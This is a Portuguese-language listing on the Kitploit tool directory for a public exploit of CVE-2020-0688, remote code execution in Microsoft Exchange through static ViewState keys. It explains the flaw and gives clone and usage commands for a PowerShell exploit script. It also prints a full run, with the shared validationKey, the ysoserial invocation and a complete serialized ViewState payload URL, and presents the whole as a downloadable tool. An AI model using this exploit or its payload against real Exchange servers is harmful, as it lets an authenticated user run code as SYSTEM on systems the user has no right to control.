Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-0688 — Execução Remota de Código no Microsoft Exchange Server através de chaves criptográficas fixas | Kitploit
Ferramentas/GitHubGitHub/mrtiz/cve-2020-0688
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubmrtiz/cve-2020-0688

CVE-2020-0688

Execução Remota de Código no Microsoft Exchange Server através de chaves criptográficas fixas

Ver Repositório
215há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-0688

Existe uma vulnerabilidade de execução remota de código no Microsoft Exchange Server quando o servidor não consegue criar chaves únicas adequadamente no momento da instalação.

O conhecimento da chave de validação permite que um usuário autenticado com uma caixa de correio passe objetos arbitrários para serem desserializados pela aplicação web, que executa como SYSTEM.

Sobre a Vulnerabilidade

O bug é encontrado no componente Exchange Control Panel (ECP). A natureza do bug é bastante simples. Em vez de ter chaves geradas aleatoriamente por instalação, todas as instalações do Microsoft Exchange Server possuem os mesmos valores validationKey e decryptionKey no web.config. Essas chaves são usadas para fornecer segurança ao ViewState. ViewState são dados do lado do servidor que as aplicações web ASP.NET armazenam em formato serializado no cliente. O cliente fornece esses dados de volta ao servidor através do parâmetro de requisição __VIEWSTATE.

Devido ao uso de chaves estáticas, um atacante autenticado pode enganar o servidor para desserializar dados ViewState maliciosamente criados. Com a ajuda do YSoSerial.net, um atacante pode executar código arbitrário .NET no servidor no contexto da aplicação web do Exchange Control Panel, que executa como SYSTEM. (Fonte)

Começando

Graças a estas instruções, você pode obter uma cópia do projeto e executá-lo em sua máquina local para fins de desenvolvimento e teste.

Pré-requisitos

  • PowerShell

Instalação

root@kitploit:~
git clone https://github.com/MrTiz/CVE-2020-0688.git

Uso

root@kitploit:~
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url <url> -Username <username> -Password <password> -Command <command> -YsoserialPath <ysoserialpath>

Exemplo

root@kitploit:~
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url 'https://localhost' -Username 'domain\username' -Password 'REDACTED' -Command 'powershell whoami > C:/whoami.txt' -YsoserialPath 'C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe'

[*] Start to exploit...
[+] Login url: https://localhost:443/owa/auth.owa
[*] Status code: 200
[+] Login successfully!
[*] Tring to get __VIEWSTATEGENERATOR...
[+] Done! __VIEWSTATEGENERATOR: B97B4E27
[*] Tring to get ASP.NET_SessionId...
[+] Done! ASP.NET_SessionId: 624abfff-85b6-4357-be8c-18a931cad256

C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell whoami > C:/whoami.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="624abfff-85b6-4357-be8c-18a931cad256" --islegacy --isdebug

[+] Exp url: https://localhost:443/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADtBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcG93ZXJzaGVsbDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BIndob2FtaSAmZ3Q7IEM6L3dob2FtaS50eHQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgviru9bDCgMPT0snH0s0u%2BA6J37Fg%3D%3D

[*] Auto trigger payload...
[+] Status code: 500, Maybe success!

Contribuindo

Contribuições são o que tornam a comunidade open source um lugar tão bom para aprender, inspirar e criar. Quaisquer contribuições que você possa fornecer são muito apreciadas.

  1. Faça um Fork do Projeto
  2. Crie seu Ramo de Funcionalidade (git checkout -b feature/AmazingFeature)
  3. Faça Commit de suas Alterações (git commit -m 'Add some AmazingFeature')
  4. Envie para o Ramo (git push origin feature/AmazingFeature)
  5. Abra um Pull Request

Autores

  • Tiziano Marra

Aviso Legal

Este exploit foi desenvolvido e publicado apenas para fins educacionais e de pesquisa. O autor não assume nenhuma responsabilidade por qualquer uso ilegal. Use por sua própria conta e risco e apenas contra sistemas para os quais você está autorizado a testá-lo.

Licença

License: GPL v3

Este projeto está licenciado sob a GNU General Public License v3.0 - veja o arquivo LICENSE para detalhes.

Baixar ferramenta